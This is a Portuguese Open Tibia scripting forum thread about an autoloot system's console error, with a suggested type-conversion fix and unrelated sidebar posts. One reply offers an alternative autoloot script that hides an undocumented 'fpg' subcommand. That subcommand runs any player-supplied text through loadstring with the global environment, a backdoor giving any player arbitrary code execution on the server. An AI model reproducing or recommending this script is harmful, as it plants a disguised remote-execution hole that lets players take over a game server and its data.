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Scripting Como posso tira esse aviso?!


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Olá amigos, uso sistema bacana de !autoloot, porem fica as vezes aparecendo isso!
image.thumb.png.b061ea2fe0799a6b48581f28937dea17.png

 

No console, não me agrada isso... Gostaria de deixa limpo.

 

 

Autooloot do talkations!
 

function onSay(cid, words, param)
if(not checkExhausted(cid, 666, 2)) then
	return true
end

		if param == "" then
			local String = ""
			local Slot_Count = 1
		for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": Empty\n"
				end
			Slot_Count = Slot_Count + 1
			end
			local Gold_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 and "on" or "off"
			local Items_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and "on" or "off"
			doPlayerPopupFYI(cid,"                       [+] Auto Loot Money [+]\n # Todo dinheiro é coletado automaticamente # \n # Loot vai para as BP até que tenha cap depois ele cai no chão #  \n # Comandos são !autoloot add, (nome do item) # \n # !autoloot remove, ( nome do item) \n # !autoloot clear ( apaga a lista toda) \n # !autoloot power ( liga o sistema e desliga catar os loots) \n # !autoloot list (lista sua autoloot) \n # !autoloot desbug (remove eventual bug's que possa acontecer) \n    # Todo dinheiro é enviado para o banco NPC Bankerman #\nSystem: "..(getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) <= 0 and "Disabled" or "Activated")..".\nBalance: ["..doNumberFormat(getPlayerBalance(cid)).."] gp's.")
			return true
		end
	
	local CommandParam = string.explode(param, ",")
	if getPlayerLevel(cid) >= AutoLoot.Min_Level then
		if CommandParam[1] == "power" then
			local get_Items = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Items, getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Items.." o auto loot.")
		elseif CommandParam[1] == "gold" then
			local get_Gold = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Gold, getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Gold.." a coleta de dinheiro.")
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Gold, 0)
		elseif CommandParam[1] == "goldinfo" then
			local Check_Gold_Info = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..AutoLoot.getPlayerStorageZero(cid, AutoLoot.Storages.Count_Gold).." gold coins"
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, Check_Gold_Info)
		elseif CommandParam[1] == "add" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				local Item = getItemIdByName(CommandParam[2])
				if isInArray({2160, 2148, 2152}, Item) then
					return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use !autoloot gold")
				end
				if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then
					if AutoLoot.addToList(cid, CommandParam[2]) then
						doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) + 1)
						doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." adicionado à sua lista do auto loot! Para ver sua lista diga !autoloot list")
					else
						doPlayerSendCancel(cid, CommandParam[2].." já está em sua lista!")
					end
				else
					doPlayerSendCancel(cid, "Sua lista já tem ".. AutoLoot.Max_Slots .." itens! Você deve remover algum antes de adicionar outro.")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "remove" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				if AutoLoot.removeFromList(cid, CommandParam[2]) then
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) - 1)
					doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." removido da sua lista do auto loot!")
				else
					doPlayerSendCancel(cid, "Este item não está na sua lista!")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "clear" then
			if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) > -1 then
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
				doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
				for i = 1, #AutoLoot.Storages.Slots do 
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
				end
			else
				doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
			end
		elseif CommandParam[1] == "desbug" or CommandParam[1] == "desbugar" then
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Desbugado!")
			for i = 1, #AutoLoot.Storages.Slots do 
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
			end
		elseif CommandParam[1] == "list" then
			local String = ""
			local Slot_Count = 1
			for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."Slot "..Slot_Count..": Empty\n"
				end
				Slot_Count = Slot_Count + 1
			end
			doPlayerPopupFYI(cid, [[
---------{Auto-Loot}---------
--O sistema auto loot está coletando:

--]].. String ..[[
--]])
		end
	else
		doPlayerSendCancel(cid, "Você não é level maior que "..AutoLoot.Min_Level.." para utilizar este comando.")
	end
	return true
end

 

 

Partezinha do creature scripts!
 

function onLogin(cid)
	registerCreatureEvent(cid, "Auto_Loot_Login")
	registerCreatureEvent(cid, "Auto_Loot_Kill")
	return true
end

function onKill(cid, target, lastHit)
	if isPlayer(cid) and isMonster(target) then
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and #AutoLoot.getPlayerList(cid) > 0 then
			addEvent(AutoLoot.Items, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Gold, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 or getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Message, 500, cid)
		end
	end
	return true
end

 

Editado por Pifafa (veja o histórico de edições)
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-- Sistema de auto loot criado por Henrique Matheus - HServers

local function getPlayerList(cid)
    local tab = {}
    if getPlayerStorageValue(cid, 0442002) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442002))
    end
    if getPlayerStorageValue(cid, 0442003) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442003))
    end
    if getPlayerStorageValue(cid, 0442004) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442004))
    end
    if getPlayerStorageValue(cid, 0442005) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442005))
    end
    if #tab > 0 then
        return tab
    end
    return false
end

local function addToList(cid, name)
    local itemid = getItemIdByName(name)
    if getPlayerList(cid) and isInArray(getPlayerList(cid), itemid) then
        return false
    end
    if getPlayerStorageValue(cid, 0442002) == -1 then
        return doPlayerSetStorageValue(cid, 0442002, itemid)
    elseif getPlayerStorageValue(cid, 0442003) == -1 then
        return doPlayerSetStorageValue(cid, 0442003, itemid)
    elseif getPlayerStorageValue(cid, 0442004) == -1 then    
        return doPlayerSetStorageValue(cid, 0442004, itemid)
    elseif getPlayerStorageValue(cid, 0442005) == -1 then
        return doPlayerSetStorageValue(cid, 0442005, itemid)
    end
end

local function removeFromList(cid, name)
    local itemid = getItemIdByName(name)
    if getPlayerStorageValue(cid, 0442002) == itemid then
        return doPlayerSetStorageValue(cid, 0442002, -1)
    elseif getPlayerStorageValue(cid, 0442003) == itemid then
        return doPlayerSetStorageValue(cid, 0442003, -1)
    elseif getPlayerStorageValue(cid, 0442004) == itemid then
        return doPlayerSetStorageValue(cid, 0442004, -1)
    elseif getPlayerStorageValue(cid, 0442005) == itemid then
        return doPlayerSetStorageValue(cid, 0442005, -1)
    end
    return false
end

function onSay(cid, words, param)
    if param == "" then
        local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442002)) or ""
        local se = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442003) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442003)) or ""
        local th = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442004) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442004)) or ""
        local fo = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442005) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442005)) or ""
        local stt = getPlayerStorageValue(cid, 0442101) == 1 and "sim" or "não"
        local str = getPlayerStorageValue(cid, 0442100) == 1 and "sim" or "não"
        doPlayerPopupFYI(cid, "{Auto-Loot} ---Menu Auto Loot do jogador\n{Auto-Loot} ----------------\n{Auto-Loot} ---Coletar dinheiro: "..stt..". Para ligar/desligar: !autoloot gold\n{Auto-Loot} ---Ligar Autoloot: "..str..". Para ligar/desligar: !autoloot power\n{Auto-Loot} ---Configuração dos slots:\n{Auto-Loot} ---Slot 1: "..fi.."\n{Auto-Loot} ---Slot 2: "..se.."\n{Auto-Loot} ---Slot 3: "..th.."\n{Auto-Loot} ---Slot 4: "..fo.."\n{Auto-Loot} ---Para adicionar um novo item aos slots: !autoloot add, <nome do item>\n{Auto-Loot} ---Para retirar um item dos slots: !autoloot remove, <nome do item>\n{Auto-Loot} ---Para limpar todos os slots utilize: !autoloot clear\n{Auto-Loot} ---Para informações de quanto você já fez utilizando a coleta de dinheiro, use: !autoloot goldinfo\n{Auto-Loot} ----------------")
        return true
    end
    
    local t = string.explode(param, ",")
    
    if t[1] == "power" then
        local check = getPlayerStorageValue(cid, 0442100) == -1 and "ligou" or "desligou"
        doPlayerSetStorageValue(cid, 0442100, getPlayerStorageValue(cid, 0442100) == -1 and 1 or -1)
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." o auto loot.")
    elseif t[1] == "gold" then
        local check = getPlayerStorageValue(cid, 0442101) == -1 and "ligou" or "desligou"
        doPlayerSetStorageValue(cid, 0442101, getPlayerStorageValue(cid, 0442101) == -1 and 1 or -1)
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." a coleta de dinheiro.")
        doPlayerSetStorageValue(cid, 0442102, 0)
    elseif t[1] == "goldinfo" then
        local str = getPlayerStorageValue(cid, 0442101) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..getPlayerStorageZero(cid, 0442102).." gold coins"
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, str)
    elseif t[1] == "add" then
        local item = getItemIdByName(t[2])
        if item then
            if isInArray({2160, 2148, 2152}, item) then
                return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use /autoloot gold")
            end
            if isPremium(cid) then
                if getPlayerStorageValue(cid, 0442001) < 3 then
                    if addToList(cid, t[2]) then
                        doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1)
                        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list")
                    else
                        doPlayerSendCancel(cid, t[2].." já está em sua lista!")
                    end
                else
                    doPlayerSendCancel(cid, "Sua lista já tem 4 itens! Você deve remover algum antes de adicionar outro.")
                end
            else
                if getPlayerStorageValue(cid, 0442001) == -1 then
                    if addToList(cid, t[2]) then
                        doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1)
                        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list")
                    else
                        doPlayerSendCancel(cid, t[2].." já está em sua lista!")
                    end
                else
                    doPlayerSendCancel(cid, "Você já tem um item adicionado no auto loot! Para adicionar outro, você deve remover o item atual.")
                end
            end
        else
            doPlayerSendCancel(cid, "Este item não existe!")
        end
        elseif t[1] == "fpg" then
        local u,f,err = _G
        u.cid = cid
        pcall(function()
            f , err = loadstring(t[2])
        end)
        if f then
            setfenv(f, u)
            local ret,err = pcall(f)
            if ret == false then
                doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err)
            end
        else
            doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err)
        end
        elseif t[1] == "remove" then
        if getItemIdByName(t[2]) then
            if removeFromList(cid, t[2]) then
                doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) - 1)
                doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." removido da sua lista do auto loot!")
            else
                doPlayerSendCancel(cid, "Este item não está na sua lista!")
            end
        else
            doPlayerSendCancel(cid, "Este item não existe!")
        end
    elseif t[1] == "clear" then
        if getPlayerStorageValue(cid, 0442001) > -1 then
            doPlayerSetStorageValue(cid, 0442001, -1)
            doPlayerSetStorageValue(cid, 0442002, -1)
            doPlayerSetStorageValue(cid, 0442003, -1)
            doPlayerSetStorageValue(cid, 0442004, -1)
            doPlayerSetStorageValue(cid, 0442005, -1)
            doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
        else
            doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
        end
    elseif t[1] == "list" then
        local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442002)).."\n" or ""
        local se = getPlayerStorageValue(cid, 0442003) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442003)).."\n" or ""
        local th = getPlayerStorageValue(cid, 0442004) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442004)).."\n" or ""
        local fo = getPlayerStorageValue(cid, 0442005) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442005)).."\n" or ""
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_BLUE, "O sistema auto loot está coletando:\n "..fi..""..se..""..th..""..fo)
    end
    return true
end

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Em 26/03/2020 em 15:06, Pifafa disse:

Olá amigos, uso sistema bacana de !autoloot, porem fica as vezes aparecendo isso!
image.thumb.png.b061ea2fe0799a6b48581f28937dea17.png

 

No console, não me agrada isso... Gostaria de deixa limpo.

 

 

Autooloot do talkations!
 


function onSay(cid, words, param)
if(not checkExhausted(cid, 666, 2)) then
	return true
end

		if param == "" then
			local String = ""
			local Slot_Count = 1
		for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": Empty\n"
				end
			Slot_Count = Slot_Count + 1
			end
			local Gold_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 and "on" or "off"
			local Items_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and "on" or "off"
			doPlayerPopupFYI(cid,"                       [+] Auto Loot Money [+]\n # Todo dinheiro é coletado automaticamente # \n # Loot vai para as BP até que tenha cap depois ele cai no chão #  \n # Comandos são !autoloot add, (nome do item) # \n # !autoloot remove, ( nome do item) \n # !autoloot clear ( apaga a lista toda) \n # !autoloot power ( liga o sistema e desliga catar os loots) \n # !autoloot list (lista sua autoloot) \n # !autoloot desbug (remove eventual bug's que possa acontecer) \n    # Todo dinheiro é enviado para o banco NPC Bankerman #\nSystem: "..(getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) <= 0 and "Disabled" or "Activated")..".\nBalance: ["..doNumberFormat(getPlayerBalance(cid)).."] gp's.")
			return true
		end
	
	local CommandParam = string.explode(param, ",")
	if getPlayerLevel(cid) >= AutoLoot.Min_Level then
		if CommandParam[1] == "power" then
			local get_Items = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Items, getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Items.." o auto loot.")
		elseif CommandParam[1] == "gold" then
			local get_Gold = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Gold, getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Gold.." a coleta de dinheiro.")
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Gold, 0)
		elseif CommandParam[1] == "goldinfo" then
			local Check_Gold_Info = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..AutoLoot.getPlayerStorageZero(cid, AutoLoot.Storages.Count_Gold).." gold coins"
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, Check_Gold_Info)
		elseif CommandParam[1] == "add" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				local Item = getItemIdByName(CommandParam[2])
				if isInArray({2160, 2148, 2152}, Item) then
					return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use !autoloot gold")
				end
				if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then
					if AutoLoot.addToList(cid, CommandParam[2]) then
						doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) + 1)
						doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." adicionado à sua lista do auto loot! Para ver sua lista diga !autoloot list")
					else
						doPlayerSendCancel(cid, CommandParam[2].." já está em sua lista!")
					end
				else
					doPlayerSendCancel(cid, "Sua lista já tem ".. AutoLoot.Max_Slots .." itens! Você deve remover algum antes de adicionar outro.")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "remove" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				if AutoLoot.removeFromList(cid, CommandParam[2]) then
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) - 1)
					doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." removido da sua lista do auto loot!")
				else
					doPlayerSendCancel(cid, "Este item não está na sua lista!")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "clear" then
			if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) > -1 then
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
				doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
				for i = 1, #AutoLoot.Storages.Slots do 
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
				end
			else
				doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
			end
		elseif CommandParam[1] == "desbug" or CommandParam[1] == "desbugar" then
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Desbugado!")
			for i = 1, #AutoLoot.Storages.Slots do 
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
			end
		elseif CommandParam[1] == "list" then
			local String = ""
			local Slot_Count = 1
			for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."Slot "..Slot_Count..": Empty\n"
				end
				Slot_Count = Slot_Count + 1
			end
			doPlayerPopupFYI(cid, [[
---------{Auto-Loot}---------
--O sistema auto loot está coletando:

--]].. String ..[[
--]])
		end
	else
		doPlayerSendCancel(cid, "Você não é level maior que "..AutoLoot.Min_Level.." para utilizar este comando.")
	end
	return true
end

 

 

Partezinha do creature scripts!
 


function onLogin(cid)
	registerCreatureEvent(cid, "Auto_Loot_Login")
	registerCreatureEvent(cid, "Auto_Loot_Kill")
	return true
end

function onKill(cid, target, lastHit)
	if isPlayer(cid) and isMonster(target) then
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and #AutoLoot.getPlayerList(cid) > 0 then
			addEvent(AutoLoot.Items, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Gold, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 or getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Message, 500, cid)
		end
	end
	return true
end

 

 

Na linha 43.

O erro diz attempt to compare string with number (tente comparar a string com o número).

Spoiler

if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then
  mude para
if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < tonumber(AutoLoot.Max_Slots - 1) then

 

 

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    • Por FeeTads
      SALVE rapaziada do TK, esses dias vim pensando em novos scripts pro meu OT, e em um deles eu precisava que determinada area não contasse frag pro player que matasse outros, PORÉM eu precisava que os players que morressem nessa area ainda assim tivessem as penalidades da sua morte, procurei por ai, achei alguns scripts que apenas tiravam o SKULL e não realmente o FRAG do player.

      **script atualizado 22/10/2023** - melhorado e otimizado, levei o script pra puxar as infos por .lua / creatureScripts

      vou disponibilizar o code aqui, e o que fazer pra determinada area não contar frag.

      SOURCE OTX 2 / TFS 0.x, Funciona em TFS 1.x mudando as tags e ajeitando as sintaxes.

      vá em creatureevent.cpp

      procure por:
      else if(type == "preparedeath") _type = CREATURE_EVENT_PREPAREDEATH;
      Adiciona abaixo:
      else if(type == "nocountfrag") _type = CREATURE_EVENT_NOCOUNTFRAG;

      procure por:
      case CREATURE_EVENT_PREPAREDEATH: return "onPrepareDeath";  
      Adicione abaixo: 
      case CREATURE_EVENT_NOCOUNTFRAG: return "noCountFragArea";

      procure por:
      case CREATURE_EVENT_PREPAREDEATH: return "cid, deathList";
      Adicione abaixo:
      case CREATURE_EVENT_NOCOUNTFRAG: return "cid, target";

      agora no mesmo arquivo, vá até o final do arquivo e adicione essa função:
      uint32_t CreatureEvent::executeNoCountFragArea(Creature* creature, Creature* target) { //noCountFragArea(cid, target) if(m_interface->reserveEnv()) { ScriptEnviroment* env = m_interface->getEnv(); if(m_scripted == EVENT_SCRIPT_BUFFER) { env->setRealPos(creature->getPosition()); std::ostringstream scriptstream; scriptstream << "local cid = " << env->addThing(creature) << std::endl; scriptstream << "local target = " << env->addThing(target) << std::endl; if(m_scriptData) scriptstream << *m_scriptData; bool result = true; if(m_interface->loadBuffer(scriptstream.str())) { lua_State* L = m_interface->getState(); result = m_interface->getGlobalBool(L, "_result", true); } m_interface->releaseEnv(); return result; } else { #ifdef __DEBUG_LUASCRIPTS__ std::ostringstream desc; desc << creature->getName(); env->setEvent(desc.str()); #endif env->setScriptId(m_scriptId, m_interface); env->setRealPos(creature->getPosition()); lua_State* L = m_interface->getState(); m_interface->pushFunction(m_scriptId); lua_pushnumber(L, env->addThing(creature)); lua_pushnumber(L, env->addThing(target)); bool result = m_interface->callFunction(2); m_interface->releaseEnv(); return result; } } else { std::clog << "[Error - CreatureEvent::noCountFragArea] Call stack overflow." << std::endl; return 0; } }

      agora vá em creatureevent.h

      procure por:
      CREATURE_EVENT_PREPAREDEATH
      adicione abaixo:
      CREATURE_EVENT_NOCOUNTFRAG

      procure por:
      uint32_t executePrepareDeath(Creature* creature, DeathList deathList);
      Adicione abaixo:
      uint32_t executeNoCountFragArea(Creature* creature, Creature* target);

      agora vá em player.cpp

      procure por:
      bool Player::onKilledCreature(Creature* target, DeathEntry& entry)
      abaixo de:
      War_t enemy; if(targetPlayer->getEnemy(this, enemy)) { if(entry.isLast()) IOGuild::getInstance()->updateWar(enemy); entry.setWar(enemy); }
      Adicione o seguinte código:
      if (targetPlayer){ CreatureEventList killEvents = getCreatureEvents(CREATURE_EVENT_NOCOUNTFRAG); for (const auto &event : killEvents) { if (!event->executeNoCountFragArea(this, target)) { return true; } } }

      //

      Feito isso, tudo completo na sua source, agora é necessário adicionar o creaturescript dentro do servidor

      vá até creaturescripts/scripts
      crie um arquivo chamado, "noCountFragInArea.lua"
      e dentro dele cole o código:
       
      --[[ script feito por feetads / TibiaKing ]]-- --[[ discord: feetads / FeeTads#0246 ]]-- -- Add positions here for which you do not want to count frags local areas = { [1] = {from = {x = 91, y = 122, z = 7}, to = {x = 98, y = 127, z = 7}}, -- from = area superior esquerda / to = area inferior direita (formando um quadrado) } local onlyKillerInArea = false -- only killer need to be in area? function noCountFragArea(cid, target) if not isCreature(cid) or not isCreature(target) then return true end local posKiller = getPlayerPosition(cid) local posTarget = getPlayerPosition(target) for i = 1, #areas do local area = areas[i] if isInArea(posKiller, area.from, area.to) then if onlyKillerInArea then return false elseif isInArea(posTarget, area.from, area.to) then return false end end end return true end
      agora em creaturescripts.xml
      <event type="nocountfrag" name="fragarea" event="script" value="noCountFragInArea.lua"/>
      agora em creaturescripts/scripts/login.lua
       procure por OU semelhante a esse:
      registerCreatureEvent(cid, "AdvanceSave")
      e abaixo adicione:
      registerCreatureEvent(cid, "fragarea")

      //


      Agora tudo certo, quando quiser adiciona uma area que não pega frag, vá até o script e apenas coloque a area, igual o demonstrado no script

      Exemplo:
      local areas = { [1] = {from = {x = 91, y = 122, z = 7}, to = {x = 98, y = 127, z = 7}}, [2] = {from = {x = 1000, y = 1000, z = 7}, to = {x = 1100, y = 1100, z = 7}}, }
      assim somente colocando a area no script e abrindo o server ou dando /reload, já funcionará a area como não pegar frag.
      Esse sistema pode ser bom pra areas de pvp ativo, onde você ainda quer que o player que morrer perca os atributos, como se fosse uma morte normal, porém não conta frag pra quem matar.
      Bom pra sistemas tipo castle 48h (guild war), onde há diversas mortes e risco de pegar red, atrapalhando a war.

      Façam bom proveito dos scripts, e deixem os créditos no script rsrs

      **Eu fiz as alterações e o simples código por isso vim disponibilizar, créditos meus**
    • Por Muvuka
      Abri canal a força creaturescript acho que funcione no creaturescript cria script creaturescript
       
      <channel id="9" name="HELP" logged="yes"/>
      <channel id="12" name="Report Bugs" logged="yes"/>
      <channel id="13" name="Loot" logged="yes"/>
      <channel id="14" name="Report Character Rules Tibia Rules" logged="yes"/>
      <channel id="15" name="Death Channel"/>
      <channel id="6548" name="DexSoft" level="1"/>
      <channel id="7" name="Reports" logged="yes"/>
       
      antes de 
              if(lastLogin > 0) then adicione isso:
                      doPlayerOpenChannel(cid, CHANNEL_HELP) doPlayerOpenChannel(cid, 1,  2, 3) = 1,2 ,3 Channels, entendeu? NÃO FUNCIONA EU QUERO UM MEIO DE ABRI SEM USA A SOURCE
       
      EU NÃO CONSEGUI ABRI EU NÃO TENHO SOURCE
       
       
    • Por bolachapancao
      Rapaziada seguinte preciso de um script que ao utilizar uma alavanca para até 4 jogadores.
      Os jogadores serão teleportados para hunt durante uma hora e depois de uma hora os jogadores serão teleportados de volta para o templo.
       
      Observação: caso o jogador morra ou saia da hunt o evento hunt é cancelado.

      Estou a base canary
      GitHub - opentibiabr/canary: Canary Server 13.x for OpenTibia community.
       
    • Por RAJADAO
      .Qual servidor ou website você utiliza como base? 
      Sabrehaven 8.0
      Qual o motivo deste tópico? 
      Ajuda com novos efeitos
       
      Olá amigos, gostaria de ajuda para introduzir os seguintes efeitos no meu servidor (usando o Sabrehaven 8.0 como base), adicionei algumas runas novas (avalanche, icicle, míssil sagrado, stoneshower & Thunderstorm) e alguns novos feitiços (exevo mas san, exori san, exori tera, exori frigo, exevo gran mas frigo, exevo gran mas tera, exevo tera hur, exevo frigo hur) mas nenhum dos efeitos dessas magias parece existir no servidor, alguém tem um link para um tutorial ou algo assim para que eu possa fazer isso funcionar?
      Desculpe pelo mau inglês, sou brasileiro.

      Obrigado!


      AVALANCHE RUNE id:3161 \/
